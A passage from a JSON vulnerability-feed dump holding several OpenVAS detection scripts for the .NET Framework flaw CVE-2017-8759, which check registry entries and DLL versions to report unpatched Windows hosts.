4.0.30319.36410' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing a critical security\n update according to Microsoft Security Updates KB4040972 and KB4040971.", "modified": "2019-12-20T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310811828", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811828", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040972 and KB4040971)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040972 and KB4040971)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811828\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 11:19:26 +0530 (Thu, 14 Sep 2017)\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040972 and KB4040971)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security Updates KB4040972 and KB4040971.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw exists due to Microsoft .NET Framework\n processes untrusted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to take control of an affected system. An attacker could then install\n programs, view, change, or delete data, or create new accounts with full user\n rights. Users whose accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate with administrative user\n rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft .NET Framework 4.6\n\n - Microsoft .NET Framework 4.6.1\n\n - Microsoft .NET Framework 4.6.2\n\n - Microsoft .NET Framework 4.7\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040972\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040971\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040972\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win2012:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n sysdllVer = fetch_file_version(sysPath:dotPath, file_name:\"system.dll\");\n if(!sysdllVer){\n exit(0);\n }\n\n ## .NET Framework 4.6/4.6.1/4.6.2/4.7 for Windows 8.1, Windows Server 2012 R2 and Windows Server 2012\n if(version_in_range(version:sysdllVer, test_version:\"4.6\", test_version2:\"4.7.2113\"))\n {\n report = 'File checked: ' + dotPath + \"\\system.dll\" + '\\n' +\n 'File version: ' + sysdllVer + '\\n' +\n 'Vulnerable range: 4.6 - 4.7.2113\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:20:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to 
Microsoft KB4040979", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811816", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811816", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040979)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040979)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811816\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 09:32:37 +0530 (Wed, 13 Sep 2017)\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040979)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040979\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an improper\n processing of untrusted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n an attacker to take control of an affected system. An attacker could then\n install programs, view, change, or delete data, or create new accounts with\n full user rights. Users whose accounts are configured to have fewer user rights\n on the system could be less impacted than users who operate with administrative\n user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5 on Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040979\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\nforeach item (registry_enum_keys(key:key))\n{\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n sysdllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.management.dll\");\n if(sysdllVer)\n {\n ## .NET Framework 3.5\n if(version_in_range(version:sysdllVer, test_version:\"2.0.50727.5700\", test_version2:\"2.0.50727.8765\"))\n {\n report = 'File checked: ' + dotPath + \"\\System.management.dll\" + '\\n' +\n 'File version: ' + sysdllVer + '\\n' +\n 'Vulnerable range: 2.0.50727.5700 - 2.0.50727.8765\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing a critical security\n update according to Microsoft Security Updates KB4040973.", "modified": "2019-12-20T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310811827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811827", "type": "openvas", "title": 
"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040973)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040973)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811827\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 10:52:54 +0530 (Thu, 14 Sep 2017)\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040973)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security Updates KB4040973.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target 
host.\");\n\n script_tag(name:\"insight\", value:\"Flaw exists as when Microsoft .NET Framework\n processes untrusted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to take control of an affected system. An attacker could then install\n programs, view, change, or delete data, or create new accounts with full user\n rights. Users whose accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate with administrative user\n rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft .NET Framework 4.6/4.6.1\n\n - Microsoft .NET Framework 4.6.2\n\n - Microsoft .NET Framework 4.7\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040973\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n sysdllVer = fetch_file_version(sysPath:dotPath, file_name:\"system.dll\");\n if(!sysdllVer){\n exit(0);\n }\n\n ## .NET Framework 4.6 for Windows Server 2008 SP2\n 
if(hotfix_check_sp(win2008:3) > 0)\n {\n ## brkVer == \"4.6.00081\" is to confirm .net version 4.6\n key1 = \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Client\\\";\n brkVer = registry_get_sz(key:key1, item:\"Version\");\n\n if((brkVer == \"4.6.00081\") && sysdllVer =~ \"(^4\\.6)\")\n {\n if(version_is_less(version:sysdllVer, test_version:\"4.7.2113\")){\n VULN = TRUE ;\n }\n }\n }\n\n ## .NET Framework 4.6/4.6.1/4.6.2/4.7 for Windows 7 and Windows Server 2008 R2\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 &&\n version_in_range(version:sysdllVer, test_version:\"4.6\", test_version2:\"4.7.2113\")){\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + dotPath + \"system.dll\" + '\\n' +\n 'File version: ' + sysdllVer + '\\n' +\n 'Vulnerable range: 4.6 - 4.7.2113\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing a critical security\n update according to Microsoft Security Updates KB4041086.", "modified": "2019-12-20T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310811829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811829", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4041086)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4041086)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811829\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 10:52:54 +0530 (Thu, 14 Sep 2017)\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4041086)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security Updates KB4041086.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw exists as when Microsoft .NET Framework\n processes untrusted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to take control of an affected system. An attacker could then install\n programs, view, change, or delete data, or create new accounts with full user\n rights. 
Users whose accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate with administrative user\n rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft .NET Framework 4.5.2\n\n - Microsoft .NET Framework 4.6\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041086\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n sysdllVer = fetch_file_version(sysPath:dotPath, file_name:\"system.runtime.remoting.dll\");\n if(!sysdllVer){\n exit(0);\n }\n\n ## .NET Framework 4.6 for Windows Server 2008 x64-based Systems Service Pack 2\n if(hotfix_check_sp(win2008x64:3) > 0 && version_in_range(version:sysdllVer, test_version:\"4.6\", test_version2:\"4.7.2113\"))\n {\n VULN = TRUE ;\n vulnerable_range = \"4.6 - 4.7.2113\";\n }\n\n ## .NET Framework 4.5.2 for Windows Server 2008 32-bit and x64-based Systems Service Pack 2\n else if(version_in_range(version:sysdllVer, test_version:\"4.0.30319.30000\", 
test_version2:\"4.0.30319.36414\"))\n {\n VULN = TRUE ;\n vulnerable_range = \"4.0.30319.30000 - 4.0.30319.36414\";\n }\n\n if(VULN)\n {\n report = 'File checked: ' + dotPath + \"\\system.runtime.remoting.dll\" + '\\n' +\n 'File version: ' + sysdllVer + '\\n' +\n 'Vulnerable range: ' + vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040978", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811323", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811323", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040978)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040978)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811323\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 14:22:58 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040978)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040978\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 2.0.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040978\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 2.0 SP2 for Windows Server 2008 SP2\n if(version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8769\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 2.0.50727.8000 - 2.0.50727.8769' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040977", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811324", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811324", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability 
(KB4040977)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040977)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811324\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 15:08:36 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040977)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040977\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target 
host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.5.2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040977\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 4.5.2 for Windows 7 SP1, Windows Server 2008 R2 SP1, and\n if(version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36414\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 4.0.30319.36000 - 
4.0.30319.36414' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:23:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040981", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811321", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811321", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040981)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040981)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811321\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 13:44:26 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040981)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040981\");\n\n 